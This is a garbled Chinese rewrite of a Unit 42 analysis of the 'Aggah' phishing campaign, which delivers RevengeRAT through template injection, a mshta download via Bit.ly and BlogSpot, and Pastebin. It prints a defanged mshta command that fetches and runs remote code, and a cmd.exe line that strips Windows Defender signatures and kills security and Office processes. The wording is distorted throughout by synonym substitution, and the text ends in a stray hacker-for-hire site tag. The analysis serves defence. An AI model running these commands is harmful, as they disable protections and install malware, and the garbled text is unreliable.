2019年3月,Unit 42开端着手研讨一同首要针对中东国家的进犯举动。研讨剖析标明,此项举动或许仅仅一同更大规划进犯举动的序幕,其方针触及美欧亚三大洲。 此次进犯举动首要经过鱼叉式网络垂钓邮件进行传达的,邮件携带了一个附件,在用户翻开后,附件会经过模板注入从长途服务器加载一个启用了宏的歹意文件,而此文件又会指向BlogSpot来获取歹意脚本,并经过该脚本从Pastebin上下载终究有用负载——RevengeRAT歹意软件。在研讨进程中,咱们发现了有好几类传达的文档,尽管内容或许有所收支,但都遵从相同的流程,最终都是在用户机器上安装了在Pastebin上保管的RevengeRAT,这标明要挟行为者在整个进犯活动中的TTP(战术、技能和进程)是不变的。 开始,咱们估测此项举动或许与Gorgon安排有关,理由有两个:一个是高水平的TTP,二是对RevengeRAT歹意软件的运用。但咱们当时还无法取得一些更确定性的方针与Gorgon安排相匹配,姑且无法将其归因于Gorgon安排。 所以咱们决议将此项举动称为Aggah举动,“Aggah”这个称号来源于Pastebin上一个保管RevengeRAT payload的账户名,也是用于切割发送到RevengeRAT C2服务器的数据的分隔符。 传达进程 咱们对Aggah举动的研讨始于2019年3月27日获取的一封文件,此文件经过电邮的方法发送到了某个中东国家的安排安排手里。这封邮件假充本国一家大型金融安排的身份,奉告用户的“账户被确定了”。开始,这封文件只呈现在了一个国家,在教育、媒体/营销和阅批笔直部分的安排中呈现比率最高,而在四天后的3月31日,咱们看到相同的邮件被发送到了第二个中东国家的某家金融安排。后来跟着时刻的推移,更多踪影逐步浮出水面,此次举动不仅仅针对中东地区,美国、欧洲和亚洲的多个安排安排也相同呈现了这份文件的身影,且进犯者针对的方针是教育、媒体、技能、零售、制作、州/地方阅批、酒店、医疗等职业。由于文件在功能上是类似的,所以咱们将描述之前剖析的原始样本。 3月27日发送的电子邮件中顺便一个Word文档,文件名为“Activity.doc”(SHA256:d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946),翻开后会企图经过模板注入加载长途OLE文档,详细进程如下:当翻开“Activity.doc”时,会显现图1,诱导用户启用宏,发动条件有必要是桌面版别的Microsoft Word,由于宏在Office 365的Word的联机版别中不起作用。“Activity.doc”文件自身不包含宏,但从长途服务器加载的OLE文包含了一个宏。
图1. Activity.doc中用于诱导用户启用宏的截图 Activity.doc剖析 此文档运用模板注入来加载保管在长途服务器上的文件。图2显现了文档页脚的内容,它会从hxxps://static.wixstatic [.] com / ugd / 05e470_b104c366c1f7423293887062c7354db2.doc处加载长途OLE文档:
图2.Activity.doc文档页脚,显现了长途OLE文件所在地 加载的OLE文件实际上是一个RTF文件(SHA256: 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f),它运用一个经过混杂的宏加载嵌入的Excel文档,宏里包含了很多“垃圾”代码。这个宏的意图是经过“Shell”指令解码并履行下列URL内容: mshta hxxp://www.bitly[.]com/SmexEaldos3 上面的指令运用了内置的“mshta”应用程序来下载URL所供给的内容,URL是用Bit.ly生成的短链接。由WildFire解析后,短链接会重定向到hxxps://bjm9.blogspot [.] com / p / si.html,如图3中HTTP呼应的“Location”字段所示。
图3.短链接,指向Blogspot 图4展现了链接指向的内容,一篇看起来有点古怪的BlogSpot文章。
图4.bjm9.blogspot (.]com屏幕截图 经过剖析博客上的代码,咱们发现它实际上包含了一个JavaScript脚本,如图5所示。
图5.嵌入的JavaScript脚本 歹意脚本在植入体系后可履行多个活动。首要,它会企图经过删去签名集来阻挠Microsoft Defender。该脚本还能杀死Defender进程以及一些Office应用程序的进程。所有这些都是运用以下指令行履行的: cmd.exe /c cd “”%ProgramFiles%Windows Defender”” & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c “”taskkill /f /im MSASCuiL.exe”” & forfiles /c “”taskkill /f /im MpCmdRun.exe”” & exit 接着该脚本会企图禁用Office产品中的安全机制,尤其是经过设置注册表项值来启用宏和禁用ProtectedView。启用Word、PowerPoint和Excel中的宏的操作是经过将某些注册表项(见附录)设置为值“1”来完结的。 禁用Word、PowerPoint和Excel中的ProtectedView安全机制则是将另一些注册表项(见附录)设置为“1”。 咱们之前的博文中曾讲过Gorgon安排在Office中启用宏和禁用ProtectedView的技能,以及对注册表项次序的修正。此外,此次举动中间断Windows Defender和Microsoft Office应用程序进程的战略也与Gorgon安排千篇一律,而且Gorgon在之前的进犯举动中也曾用bit.ly缩写URL的行为,尽管存在显着的技能堆叠,但仍然缺少详细的依据标明这次进犯活动与Gorgon有关。保管在Blogspot上的脚本首要履行三个活动,包含:[1][2][3][4]黑客接单网